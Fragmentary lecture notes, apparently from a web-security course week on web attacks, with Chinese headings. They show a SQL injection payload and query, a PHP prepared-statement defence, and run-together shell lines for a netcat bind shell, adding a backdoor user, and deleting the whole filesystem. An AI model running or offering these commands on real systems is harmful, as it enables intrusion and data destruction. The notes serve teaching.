Week 7 - Web Attacks Part 1
简单介绍web攻击
Last updated
简单介绍web攻击
Last updated
Secret Item:
’ OR ’1’=’1’ ) --
SELECT * FROM items WHERE (item=’’ OR ’1’=’1’) -- ’) // prepare and bind
$stmt = $conn->prepare ("INSERT INTO People (firstname, lastname) VALUES (?, ?)");
$stmt->bind_param("ss", $firstname, $lastname); // set parameters and execute
$firstname = "John";
$lastname = "Doe";
$stmt->execute();nc -l -p 9999 -e /bin/bash #在9999端口上启动一个bash
useradd tpc -p 12345 # add user tpc:12345
rm -f -r /